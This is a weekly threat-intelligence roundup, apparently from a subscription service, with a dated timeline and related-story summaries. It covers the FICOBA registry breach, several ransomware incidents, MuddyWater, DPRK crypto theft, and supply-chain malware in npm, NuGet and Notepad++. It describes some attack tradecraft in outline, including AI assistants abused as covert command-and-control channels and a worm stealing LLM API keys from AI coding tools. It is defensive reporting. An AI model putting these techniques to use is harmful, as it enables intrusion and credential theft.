Weekly threat intelligence roundup covering breaches, ransomware, and emerging AI-enabled tradecraft
Reporting during the week of Feb. 23 highlighted multiple unrelated security incidents and research findings rather than a single cohesive event. France’s Ministry of Economy disclosed unauthorized access to the national bank account registry FICOBA, exposing data tied to ~1.2 million accounts (e.g., names, addresses, account identifiers, and in some cases tax-related identifiers), with officials attributing access to compromised government credentials. Separately, Advantest reported a ransomware intrusion following third-party unauthorized access, University of Mississippi Medical Center experienced a ransomware event that disrupted clinics and electronic medical records, and Ukraine’s National Bank reported a supply-chain exposure at a contractor supporting its collectible coin online store (customer registration data exposed; payment data reportedly unaffected). In Taiwan, Taipei Grand Hotel said a third party accessed internal systems without authorization during the Lunar New Year period; the hotel took networks offline for forensics and warned customers to be cautious of suspicious messages.
Threat-actor and technique reporting also described ongoing campaigns and emerging tradecraft. MuddyWater (Iran-aligned) was reported targeting MENA organizations in “Operation Olalampo,” using phishing lures with malicious Office documents/macros to deploy tooling including GhostFetch, HTTP_VIP, a Rust backdoor CHAR, and an implant dubbed GhostBackDoor, with one chain also deploying AnyDesk for remote access. Separately, reporting on DPRK-linked crypto operations described sustained, social-engineering-led targeting of the crypto ecosystem following the Bybit theft, including AI-assisted persona and communication crafting and laundering via mixing/OTC pathways. Additional research noted internet-wide scanning telemetry involving OAST/Interactsh callback domains and shifts toward cookie-based injection, while another item profiled PRC-attributed Lotus Blossom as an espionage actor (including discussion of the Notepad++ ecosystem incident) and a separate post provided general reconnaissance methodology rather than incident-specific intelligence.
Timeline
Feb 23, 2026
Wynn breach details emerge with 800,000 records allegedly stolen
Sherpa Intelligence reported that ShinyHunters allegedly stole more than 800,000 Wynn records and demanded $1.5 million to prevent the data from being leaked.
Feb 23, 2026
Chrome zero-day CVE-2026-2441 is reported as exploited in the wild
Check Point reported that Chrome zero-day CVE-2026-2441 was being exploited in the wild, marking a notable active exploitation event.
Feb 23, 2026
Grandstream VoIP RCE vulnerability is publicly highlighted
Check Point's bulletin highlighted critical Grandstream VoIP remote code execution flaw CVE-2026-2329 as a significant newly reported vulnerability.
Feb 23, 2026
Researchers detail npm typosquatting worm targeting developer and AI secrets
Check Point summarized a supply-chain campaign in which an npm worm spread via typosquatting, stole developer and CI secrets, and targeted AI coding assistants to harvest LLM API keys.
Feb 23, 2026
Researchers report genAI-assisted FortiGate credential abuse campaign
A Russian-speaking actor was reported using commercial generative AI to scale credential abuse against FortiGate devices and then pivot to target Veeam servers.
Feb 23, 2026
Researchers show AI assistants can be abused as covert C2 proxies
Check Point researchers demonstrated that AI assistants such as Grok and Microsoft Copilot can be misused as covert command-and-control channels, highlighting a new AI-enabled threat technique.
Feb 23, 2026
National Bank of Ukraine contractor exposes coin store customer data
Check Point reported a supply-chain exposure at a contractor supporting the National Bank of Ukraine's collectible coin store, leaking customer registration data but not payment information.
Feb 23, 2026
Advantest reports ransomware after unauthorized network access
Advantest disclosed that an unauthorized party accessed parts of its network and that the incident involved ransomware, according to the Check Point bulletin and Sherpa roundup.
Feb 23, 2026
France discloses FICOBA registry breach affecting 1.2 million accounts
French authorities disclosed that attackers used stolen credentials to access the FICOBA national bank-account registry and exfiltrated data tied to 1.2 million accounts.
Feb 21, 2026
Taipei Grand Hotel is reported targeted in a cyberattack
Taiwan News published reporting that Taipei Grand Hotel had been targeted in a cyberattack, indicating a newly disclosed victim in Taiwan's hospitality sector.
Feb 19, 2026
University of Mississippi Medical Center detects ransomware attack
On February 19, 2026, the University of Mississippi Medical Center detected a ransomware attack that disrupted network and IT systems, including its Epic electronic medical record environment.
Feb 14, 2026
GreyNoise observes concentrated OAST scanning activity
Between February 14 and February 20, 2026, GreyNoise recorded 5,695 OAST domain occurrences across 3,882 sessions from 24 source IPs, with increased cookie-based injection and heavy Nuclei/loopback usage.
Jan 26, 2026
MuddyWater's Operation Olalampo is first observed
Group-IB said a new MuddyWater campaign dubbed Operation Olalampo was first observed on January 26, 2026, targeting organizations and individuals across the Middle East and North Africa with phishing and malware delivery.
Jan 1, 2026
DPRK social-engineering campaigns steal $37.5 million in early 2026
From January 1 to mid-February 2026, the DangerousPassword and Contagious Interview campaigns allegedly generated $37.5 million by tricking victims into installing malware that steals keys, seed phrases, and credentials.
Dec 31, 2025
DPRK-linked thefts reach a record $2 billion in 2025
The reporting states that DPRK-linked operators stole a record $2 billion in 2025, bringing cumulative known cryptocurrency thefts attributed to North Korea to more than $6 billion.
Dec 8, 2025
Cheyenne and Arapaho Tribes suffer disruptive intrusion
On December 8, 2025, the Cheyenne and Arapaho Tribes experienced an intrusion that disrupted schools and government operations; Rhysida later claimed responsibility according to the roundup.
Sep 1, 2025
Wynn breach reportedly begins with PeopleSoft access and employee credentials
Sherpa Intelligence reported that the ShinyHunters-linked breach of Wynn involved initial access in September 2025 through an Oracle PeopleSoft vulnerability and an employee's credentials.
Feb 21, 2025
DPRK-linked actors steal $1.46 billion from Bybit
On February 21, 2025, North Korea-linked operators allegedly stole about $1.46 billion in cryptoassets from Dubai-based exchange Bybit, in what the report describes as the largest confirmed crypto theft to date.
Jan 1, 2025
Lotus Blossom launches Notepad++ supply-chain operation
The group allegedly began a 2025-2026 supply-chain campaign targeting Notepad++ by manipulating update infrastructure to distribute trojanized updater components and deliver the Chrysalis backdoor via DLL sideloading.
Jan 1, 2025
Lotus Blossom targets a national certificate authority
In 2022, Lotus Blossom reportedly escalated from traditional intrusion methods to compromising a national certificate authority, marking a shift toward attacks on mechanisms of trust.
Jun 1, 2024
UNC6201 exploits Dell RecoverPoint zero-day in the wild
Check Point reported that suspected Chinese threat actor UNC6201 has exploited Dell RecoverPoint for VMs zero-day CVE-2026-22769 since mid-2024, indicating a prolonged real-world exploitation window before public reporting.
Jan 1, 2009
Lotus Blossom begins long-running cyber-espionage activity
Lotus Blossom is described as an APT active since at least 2009, conducting cyber-espionage operations primarily against government, military, and strategic-sector targets in the Asia-Pacific region.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Vulnerabilities
Threat Actors
Organizations
Sources
2 more from sources like taiwannews.com.tw and socradar blog
Related Stories
Mixed threat reporting: APT campaigns, malware delivery via compromised web assets, and ransomware exploitation
The provided items do not describe a single cohesive cybersecurity event; they span multiple unrelated threat reports and opinion pieces. Notable incident-level reporting includes **APT28** activity in Western/Central Europe (“Operation MacroMaze”) using spear-phishing lures with Office macros that beacon via `INCLUDEPICTURE` to `webhook[.]site` and then execute VBScript/CMD/batch stages for persistence and follow-on payload delivery. Separately, **MuddyWater** (Iran/MOIS-linked) was reported running “Operation Olalampo” against organizations in the Middle East and Africa, delivering new custom malware (including a **Char** backdoor using a **Telegram bot** for C2) and, in some cases, attempting exploitation of public-facing servers in addition to phishing. Criminal activity and initial-access tradecraft were also covered across distinct stories: a DFIR case study described exploitation of **Apache ActiveMQ** `CVE-2023-46604` to gain RCE, conduct post-exploitation (Metasploit/Meterpreter, privilege escalation, LSASS access, lateral movement), and ultimately deploy **LockBit**-branded ransomware via RDP using previously stolen credentials (with indications the payload was built using the leaked builder and used *Session* for communications). Multiple reports described malware delivery via compromised web assets and social engineering, including **GrayCharlie** injecting malicious JavaScript into WordPress sites to push **NetSupport RAT**, **Stealc**, and **SectopRAT** via fake updates/ClickFix-style CAPTCHAs, and a separate **ClickFix** campaign delivering a custom C++ RAT (**MIMICRAT**) through fake Cloudflare verification prompts that trick users into running PowerShell. Additional, unrelated threat reporting included a **NuGet** supply-chain attack (typosquatted `NCryptYo` plus companion packages) targeting ASP.NET Identity data and enabling backdoored authorization rules, and malicious Chrome extensions using a “**Promise Bomb**” browser-crash technique to drive users to run fake “CrashFix” PowerShell steps. Several other items were generic commentary/roundups (data breach trends, quantum preparedness, Enigma history, NATO public opinion polling, recon how-to, and a malware-newsletter link list) and do not add event-specific intelligence.
1 months ago
Security Research Roundup: Supply-Chain Malware, Phishing Operations, and Evolving Social Engineering
Multiple security reports and investigations highlighted active threats spanning software supply chain abuse, phishing operations, and commodity malware delivery. Socket identified **four malicious NuGet packages** (e.g., *NCryptYo*, *DOMOAuth2_*, *IRAOAuth2.0*, *SimpleWriter_*) published by `hamzazaheer` that targeted **ASP.NET** developers by exfiltrating ASP.NET Identity data (users/roles/permissions) and manipulating authorization to maintain persistence; the campaign used a staged loader that set up a local proxy on `localhost:7152` to relay traffic to dynamically resolved C2 infrastructure. Separately, investigators disrupted a logistics-focused **phishing-as-a-service** operation (“**Diesel Vortex**”) tied to Russian/Armenian operators, which used dozens of domains to target users of platforms such as **DAT**, **Truckstop**, **Penske Logistics**, **EFS**, and **Timocom**, resulting in theft of over **1,600 credentials** and attempted **EFS check fraud**. Fortinet also detailed a **multi-stage Agent Tesla** infection chain delivered via phishing with RAR attachments leading to `.jse` and PowerShell stages, culminating in in-memory execution and process hollowing into `C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe`. Threat intelligence and ecosystem reporting also underscored how attackers are scaling operations and bypassing traditional controls. Group-IB reported **MuddyWater** (“Operation Olalampo”) targeting the **MENA** region with new tooling including **GhostFetch** and a Rust backdoor (**CHAR**) controlled via **Telegram**, plus variants that deploy **AnyDesk**; the report noted indicators consistent with **AI-assisted development**. Dark Reading described the rise of **telephone-oriented attack delivery (TOAD)** emails—messages containing only a phone number—which accounted for a significant share of gateway-bypassing detections in StrongestLayer’s dataset, reflecting a shift toward social-engineering paths that evade link/attachment scanning. Confiant reported disrupting **D-Shortiez** malvertising operations after discovering exposed internal testing/admin infrastructure, attributing **59 million** malicious ad impressions (primarily US-targeted) to scam campaigns, while Interpol-backed **Operation Red Card 2.0** reported **651 arrests** and **$4.3M** recovered across 16 African countries in actions against fraud rings and cybercrime syndicates.
1 months ago
Multi-stage phishing and supply-chain malware campaigns targeting credentials and long-term access
Multiple reports highlight active campaigns using *phishing* and *software supply-chain abuse* to steal credentials and establish persistence. eSentire described an espionage-focused operation targeting residents of India with emails impersonating the Income Tax Department, leading victims to a malicious archive that uses DLL side-loading with a legitimate signed Microsoft application, extensive anti-analysis checks, in-memory shellcode unpacking, UAC bypass, and process masquerading; the payload was identified as a **Blackmoon**-family variant that specifically attempts to disable **Avast Free Antivirus** by automating UI interactions to add exclusions. Separately, Aikido reported a malicious npm package (`ansi-universal-ui`) that deploys a multi-stage infostealer (“**G_Wagon**”) by abusing `postinstall` execution, downloading a Python runtime, running an obfuscated payload, and exfiltrating browser credentials, cloud credentials, Discord tokens, and data from 100+ cryptocurrency wallets to an Appwrite storage bucket; it also includes a Windows DLL used for browser-process injection via NT native APIs. In parallel, network-edge exploitation remains a key access vector: Risky Business reported a renewed wave of attacks against **Fortinet FortiGate** devices via a vulnerability Fortinet allegedly “patched” in December but which attackers can still exploit, enabling SSO authentication bypass (via crafted SAML), creation of new admin accounts, and theft of device configuration; mitigations include disabling the FortiCloud SSO feature (not enabled by default). Several other items are general awareness or roundup content rather than specific incident reporting: TechTarget and other blogs emphasized ongoing phishing/email risk (including relay spam abusing legitimate Zendesk instances) and password hygiene, while The Hacker News published a multi-story bulletin that includes (among other items) a spear-phishing campaign in Afghanistan delivering a FALSECUB backdoor via a GitHub-hosted ISO and LNK execution chain; Risky Business also covered Iran’s internet blackout and Starlink jamming/spoofing as a communications-control issue rather than an enterprise cyber incident.
1 months ago